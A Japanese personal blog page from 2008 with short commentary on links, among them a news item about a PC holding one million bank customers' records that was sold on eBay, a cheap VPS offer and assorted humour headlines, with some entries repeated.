イギリスで、金融データの保管サービスを提供するメールソース社の社員が、銀行の顧客100万人分の個人情報が記録されているコンピュータを eBay で売却していたそうです。 コンピュータを 約7,000円で落札した人物がデータを発見したことで発覚したらしい。[雑談] * 理系のための恋愛論 (292) 「ウソ、好きって態度じゃないと思う」
女の子のほうから告白して貰えるなんて、こんな幸運、オレには起こらないだろうなぁ。orz[雑談] * iPhoneからキャラが3Dで浮き上がる:「iHologram」 (GIZMODO)
モーションセンサーってすごいな、こんな使い方よく思いつくなぁ。
DVDの場合は、CDと違って著作権法だけでなく不正競争防止法とか関わってくるのね。[出来事] * 顧客情報100万人分が入ったPCを誤ってイーベイで売却 (AFPBB News)
イギリスで、金融データの保管サービスを提供するメールソース社の社員が、銀行の顧客100万人分の個人情報が記録されているコンピュータを eBay で売却していたそうです。 コンピュータを 約7,000円で落札した人物がデータを発見したことで発覚したらしい。[雑談] * 理系のための恋愛論 (292) 「ウソ、好きって態度じゃないと思う」
女の子のほうから告白して貰えるなんて、こんな幸運、オレには起こらないだろうなぁ。orz[雑談] * iPhoneからキャラが3Dで浮き上がる:「iHologram」 (GIZMODO)
モーションセンサーってすごいな、こんな使い方よく思いつくなぁ。
2008/08/31(日)日曜日ー。(ロリコン外科医いい加減懲りろ。(←回文))
[雑談] いろいろ。
[雑談] * rootが使えて&転送量無制限で1890円から使えるVPS (iRSSの日記)
今使っているレンタルサーバ(マネージド共有サーバ)は、料金は超安ですが、ホームページ&メールが普通に使えるくらいで、設定の自由度や容量やレスポンスに不満が無いと言えばウソになるからなぁ。 仮想専用サーバ、この値段なら検討してみようかなー。 なんか面白そうだし。
- 雨がすごいからピザ注文したwwwwwwwwwwwwwwwwwww (人生VIP職人ブログ)
- なぜ親の承諾が必要なのか?・・・二人だけでは結婚できない現状 (Ohnoblog 2)
- ことわざの一部を「死ぬ」に変えると一気に殺伐とする (VIPPERな俺)
- で、お前らってクラスの何とかランキングで何にランクしてたの? (VIPPERな俺)
- 「原爆ドーム」背景にパンチラダンス→ブログ大炎上、女子大生謝罪 (痛いニュース)
- 【ドット絵で】博麗神社の一日【東方】 (ニコニコ動画)
- タモリさん (こくばん.in)
- 「mixiエコー? 快くは思ってないよ」--Twitter創業者 (CNET)
- バッチ更新までの空隙を狙う「ゼロアワー攻撃」が増加 (Techinsight)
[雑談] * rootが使えて&転送量無制限で1890円から使えるVPS (iRSSの日記)
今使っているレンタルサーバ(マネージド共有サーバ)は、料金は超安ですが、ホームページ&メールが普通に使えるくらいで、設定の自由度や容量やレスポンスに不満が無いと言えばウソになるからなぁ。 仮想専用サーバ、この値段なら検討してみようかなー。 なんか面白そうだし。